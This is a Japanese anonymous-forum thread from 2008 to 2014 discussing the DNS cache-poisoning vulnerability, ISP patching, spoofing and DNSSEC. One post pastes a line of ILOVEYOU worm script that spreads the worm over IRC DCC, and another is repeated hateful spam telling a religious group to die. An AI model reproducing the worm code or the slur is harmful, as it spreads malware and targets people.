DNSプロトコルの脆弱性情報 漏洩する

このエントリーをはてなブックマークに追加
99名無しさん@お腹いっぱい。:2008/08/09(土) 09:21:39
管理外再帰の可能なDNSに限って言えば、国内の主要な所は更新されたようだね
大学も殆ど対応済み
CATVも殆ど対応済み

ただOCNの下にぶら下がる地方のプロバイダの更新が遅いね
お知らせコーナーを見ると更新が2007年代で止まってる所もあるし、こう言う所は危ないな
100名無しさん@お腹いっぱい。:2008/08/10(日) 18:18:15

インターネット終了のお知らせ。
DNSの脆弱性の実証コードがリリースされる。
僅か数分で汚染可能
ttp://news4vip.livedoor.biz/archives/51190869.html
101名無しさん@お腹いっぱい。:2008/08/10(日) 22:18:55
>>100
海外のBIND板だと対抗策も出てるけど、本家+第三者加工プログラムみたいな感じで導入が難しいな
Windows環境だと今の所完全防御は絶望的
102名無しさん@お腹いっぱい。:2008/08/11(月) 07:49:48
でもさ、ポイズニングって送信元IPアドレスの
詐称ができないとだめなんでしょ?
ISPは出て行くパケットについてのチェックをしてないのかな。
103名無しさん@お腹いっぱい。:2008/08/11(月) 14:58:41
>>102
その出て行くパケってのはサーバと言う意味で書いてるの?契約ユーザーいう意味で書いてるの?

管理者の手元にあるサーバからは改変されたパケなんて出ないからチェックする意味が無い
ユーザーからは改変されたパケが飛ぶかもしれないが、それが何を意味するか分からないのに止めたら大問題だ

都合、チェックをする意味が無い
チェックをしたとしても赤の他人のサーバにそれを信じろと言うのは無理だろ?
だからサーバは入ってくるパケの整合性を調べる努力をするしかない
104名無しさん@お腹いっぱい。:2008/08/19(火) 01:44:53

結局被害は無しなのな
105名無しさん@お腹いっぱい。:2008/08/19(火) 20:50:37
>>104
へ?被害でてるじゃん?
ネット系のニュースで一週間以上も前に見たぞ

いくつか出てたうちの一つはアフィリエイト目的のページに数千人単位で誘導するという豪快なんだか小悪党なんだか分からないやつだったけど
あれがウイルスバラマキじゃなかったから大騒ぎになってないだけ
106名無しさん@お腹いっぱい。:2008/08/19(火) 21:43:40
>>105
それって誘導されただけで
被害って程じゃないジャン
振り込め詐欺ぐらいのはないの?
107名無しさん@お腹いっぱい。:2008/08/20(水) 01:59:12
誘導に成功してるって事は、ルール無用の自前サーバで何でも出来るって事と同義だよ
あと、折角丁寧にネット上の足跡を消したのに、振り込め詐欺を行うと口座から何から全部残ってしまうから普通はしない
やるならカードの暗証蛮語を入力させる方式で、全世界の好きな所でお金をおろせる方を選ぶだろうね

因みにアフィリエイトに誘導しただけで、検索場を提供してる側には営業利益的に軽く数百万の被害が出ている
キャッシュをクリアした直後の効率低下も考えれば数字にならない阻害も大きい

勿論アフィリエイトを登録されていた側も詐欺的な手法で出来高払いを行わなければならないので、払っていたら被害金額として、払わなくても詐欺の被害を受けている事になる
エンドポイントである一ユーザーの被害は聞こえてこなくても、既に十分に被害が出てるよ
108名無しさん@お腹いっぱい。:2008/08/20(水) 07:47:20
アフィリエイト提供側に被害って・・・・
誘導してくれてむしろありがとうだろうw
109名無しさん@お腹いっぱい。:2008/08/21(木) 19:10:57
アフィリエイトは相手に悪い印象を与えたら商品のイメージが最悪になる
だから日本の普通のアフィリエイトは小さく邪魔せずページの内容に沿った物が表示される事が多い

検索から誘導されて飛んだページにアフィリだけ置いてあって、しかもページが怪しさ満点だったりするとアフィリまで怪しいと思われかねない
誰も飛ばないバナーなのに表示するだけで金が取られるってアフィリの会社からすると最悪だよ
110名無しさん@お腹いっぱい。:2008/08/21(木) 20:53:22
>>109
おまえ、アフィリエイトの仕組み分かってないだろ?
商品の宣伝なんぞのためにアフィはそんざいしているのではないよ

正確には広告主の要望にしたがってサイトを運営してもらうために
金をばら撒いている、というのが本音
111名無しさん@お腹いっぱい。:2008/08/22(金) 09:13:28

「ネットの基幹インフラに重大欠陥 暗証番号盗み見も」
http://www.nikkei.co.jp/news/main/20080822AT2G2100D21082008.html
・・・基幹インフラである「DNSサーバー」に欠陥が見つかったとして
注意を呼びかけ始めた。・・・
112名無しさん@お腹いっぱい。:2008/08/22(金) 09:42:40
>>111
>被害事例はまだ報告されていないものの
113名無しさん@お腹いっぱい。:2008/08/22(金) 09:44:16
cache poisoning自体はずいぶん昔から指摘されていた欠陥だしね今さらな感も
114名無しさん@お腹いっぱい。:2008/08/22(金) 15:30:53
115名無しさん@お腹いっぱい。:2008/08/22(金) 15:41:52
>>111

>>114
の内容は違うんじゃないのか?

>>111 のは"DNSサーバーに偽の住所情報を大量に送りつけると"ってあたりが一連のDNS Spoofingと違う気がする
>>114 のは例の"ポートが固定されていたら〜"から派生する内容だよね?

>>111 の具体的な方法はどんなものだろう?日経の記事は必要以上に丸められていてわからん
116名無しさん@お腹いっぱい。:2008/08/22(金) 17:20:47
>>115
いやたぶん同じことを言おうとしているんだと思う
日本ネットワークインフォメーションセンターとやらが
この時期別の危険性を声高に叫ぶはずないでしょ
117名無しさん@お腹いっぱい。:2008/08/22(金) 22:13:20
ttp://www.nic.ad.jp/ja/topics/2008/20080822-01.html

いまごろ知ったのか>日経
118名無しさん@お腹いっぱい。:2008/08/23(土) 02:23:09
日経・・・日本のオンライン経済活動に疎いんじゃないのか
何にしてもあの記事の書き方は知識がある人が見ても謎な文章だから、そうじゃない人には尚更だっただろう

もしかしてネットワーク系の会社の株を操作したんじゃあるまいな〜
多分ちょっとは下がってるはずだし、場の雰囲気が悪化したと思うが
119名無しさん@お腹いっぱい。:2008/08/27(水) 06:49:07
今、NHKでこれのニュースが有った。
「専用のプログラムを使用すれば対策出来る」とのこと。
被害例として、金融システムにアクセスしようとしたら、詐欺サイトうんぬん。

煽ってる割には、だからどうすんねん!というニュースでした。
120名無しさん@お腹いっぱい。:2008/08/27(水) 08:50:32
>「専用のプログラムを使用すれば対策出来る」

なんと便利な解説>NHK
この言葉,いつでも使えそうだな(笑
121名無しさん@お腹いっぱい。:2008/08/29(金) 18:53:12
これに絡んでエンタープライズウォッチで自社製品の売り込みしてる
おっさんの記事見て思ったんだけど、
自由度40億で破るのに10時間かかるなら、DNSのリクエストを2回送って
二つのレスポンスをクロスチェックするだけで、
自由度が1600京になって安全性を確保できるんじゃね?

122名無しさん@お腹いっぱい。:2008/08/29(金) 20:16:11
そう言うのはBINDの有志が組んだものがあるけど、最初の名前解決に恐ろしい程時間がかかるよ
個人なら耐えられるけど、ISPでは耐えられないかも
あと、複数参照は攻撃された部位が上流の場合は同じ汚染情報を受け取ってしまうのも弱点

個人的にはDNSSECお勧め
123名無しさん@お腹いっぱい。:2008/08/30(土) 05:10:10
問い合わせ二回だから時間が2倍になるってこと?
それ以上というニュアンスで受け取ったけど、なぜだろう・・・?
124名無しさん@お腹いっぱい。:2008/08/31(日) 02:22:25
まずフォワード先は最低3カ所は必要
なぜなら二つではどちらかが汚染されてたとしても同数だから多数決で判断できなくなるから
フォワード先は上流の分かれた奇数カ所が望ましいとされている
日本の場合は外部からの再帰的問い合わせに答えるDNSサーバが80カ所以上あるので、これは何とかなる

フォワード先を増やすと、基本的には全ての解決が終了してからでないと汚染確認が始まらない
フォワード先のDNSサーバが名前解決を失敗したり、回線の都合で立ち消えになったりすると、タイムオーバーまで名前解決が停止する
一度キャッシュされた後は通常と同じ速度で再帰的問い合わせに答えるが、キャッシュ生存時間が過ぎれば再び同じ手順を経る事になる
多数のフォワード先を利用する都合、最も遅いDNSサーバの影響を大きく受ける

自分の上流のDNSサーバ以外を利用する為、今まで5〜10msで解決出来ていたものが20〜40ms掛かるようになり、更に汚染確認の処理が入る為50msを越える事が多くなる
125名無しさん@お腹いっぱい。:2008/08/31(日) 20:33:57
>>124
分からないので教えてほしいのですが、
外部のフォワーダ3台以上使って各応答を検証する特殊な仕組みを作るより、
普通のフルサービスリゾルバ持って自力でルートから素直に辿るほうが
自然そうなんですけれど、それじゃ駄目?
126名無しさん@お腹いっぱい。:2008/08/31(日) 23:39:07
>>125
124じゃないが答えてみる

その方法だと一部のサーバにすげぇ無理が行くし、フルサービスリゾルバって結局は他力本願なキャッシュサーバーだよな
そこに問い合わせる方法が安全でも中身が腐ってたら意味なさそう

あと124も分かってて端折ってるのかも知れんが直接攻撃でキャッシュ書き換えられたらどーしよーもない
多数のフォーワードに聞きに行く方法は自分は攻撃されないだろうという楽観的な対策のひとつに過ぎんよ
127名無しさん@お腹いっぱい。:2008/09/01(月) 00:14:18
やっぱり根元的な対策はDNSSECしかないのでは
128名無しさん@お腹いっぱい。:2008/09/01(月) 07:40:58
根本的な問題として,
IPにおける送信元アドレスの詐称は動揺もないのか?
129名無しさん@お腹いっぱい。:2008/09/01(月) 07:41:18
動揺→どうしよう
130名無しさん@お腹いっぱい。:2008/09/03(水) 00:07:25
技術的には可能だろうけど、主観時間的に不可能だし、予算的に不可能だし、フォーマット的に不可能だと思う
131名無しさん@お腹いっぱい。:2008/09/05(金) 09:55:17
何か全然被害ないねえ
ハッカーどうしたの?
132名無しさん@お腹いっぱい。:2008/09/06(土) 02:31:38
OCNだけどようやくGREATになった
133名無しさん@お腹いっぱい。:2008/09/06(土) 10:39:51

詳細が明かされたDNSキャッシュ・ポイズニングの新手法
ぜい弱性の有無のチェックと対策は計画的かつ確実に

ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080811/312660/
134名無しさん@お腹いっぱい。:2008/09/06(土) 11:12:57
テストできないよね?
https://www.dns-oarc.net/oarc/services/dnsentropy
135名無しさん@お腹いっぱい。:2008/09/06(土) 11:45:10
ん? できたけど

ちなみにbiglobeだけどすべてGREATですた!
136124:2008/09/06(土) 20:36:41
>>126
ごめんなさい、やっぱり分かりません。私が意図してたのは、
・各応答を検証する仕組みは、自宅 or 自サイトで持つサーバで作るのだろう(推測)
・その仕組みから、ヨソ(外部組織)の野良キャッシュサーバを多数使う?
・それなら自宅内で BIND でも何でもいいからあげて、ルート→jp→co.jpと順次辿る、
 ルートサーバとオリジンサーバを信じる普通のやり方でいいのでは。
ということです。
検証のため(?)という理屈で知らない人からの再帰クエリーを送りつけられる、
ヨソのキャッシュサーバたちの方が「一部のサーバにすごい負荷」な状態に
あたるのではないかなと。

「直接攻撃でキャッシュ書き換えられたらどーしよーもない」には同感です。
外部組織からの再帰検索を受けつける甘いサーバより、自宅 BIND の方が信じられそう。

137名無しさん@お腹いっぱい。:2008/09/12(金) 12:17:12
http://support.microsoft.com/kb/956190/
NATの下のプライベートなDNS(Win2003のDC)だけど関係あんの?
138名無しさん@お腹いっぱい。:2008/09/17(水) 14:32:50
「攻撃トラフィック」発信源、ワースト1位は日本 | WIRED VISION
http://wiredvision.jp/news/200809/2008091122.html

>攻撃トラフィックの発信源、すなわち「分散型サービス拒否」(DDoS)攻撃や、
>ハッキング行為、DNS(ドメイン・ネーム・システム)ハイジャックのトラフィ
>ックが特に多かったのは、日本[30.07%。前期の3.56%(7位)から急浮上した]、
>米国[21.52%]、中国[8.90%]、ドイツ [5.56%]だった。
139名無しさん@お腹いっぱい。:2009/02/25(水) 11:54:41
140名無しさん@お腹いっぱい。:2009/10/21(水) 14:06:16
誰か教えて下さい。

うちのサイトをグーグルのキャッシュで表示すると
全然別のドメインでクッキー許可のポーズ画面(プイバシーの警告)が表示されます。
(当サイトではそもそもクッキーは使用していません。)

詳細情報を見ると searchportal.information・・・何とかかんとかの文字が・・・

「searchportal.information」をグーグルで検索すると

DNSポイズニングsearchportal.information.comがやってきた! - SEO
http://www.search-seo.info/2008/11/dnssearchportalinformationcom.html

DNSポイズニングってヤバイのでしょうか?
新種のアタッキングでしょうか?  対処方法はないでしょうか?
そもそも何故グーグルのキャッシュページにプライバシーの警告画面がでるんでしょうか?

誰か教えて下さい。

141名無しさん@お腹いっぱい。:2011/01/09(日) 20:41:05
Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
142名無しさん@お腹いっぱい。:2012/03/24(土) 20:01:13.22
てst
143名無しさん@お腹いっぱい。:2012/03/24(土) 20:06:26.62
とりあえず対策としてルータのDNSフォワードは使わず、OSのDNS設定にDNS Benchmark(GRC)で調べたエラーのなく高速なDNSアドレスを幾つか列記でおk?
144名無しさん@お腹いっぱい。:2012/10/11(木) 06:44:54.25
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね 
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね 
創,価
死,ね
145名無しさん@お腹いっぱい。:2013/07/22(月) NY:AN:NY.AN
Ubuntuフォーラムに不正アクセス、ユーザー情報が流出
http://www.itmedia.co.jp/enterprise/articles/1307/22/news077.html
146名無しさん@お腹いっぱい:2014/02/11(火) 04:27:39.79
hosyu age
147 忍法帖【Lv=40,xxxPT】(1+0:8) :2014/04/15(火) 19:56:11.22
148名無しさん@お腹いっぱい。
DNSSEC Validation対応しているISPはどのくらいあるんだ?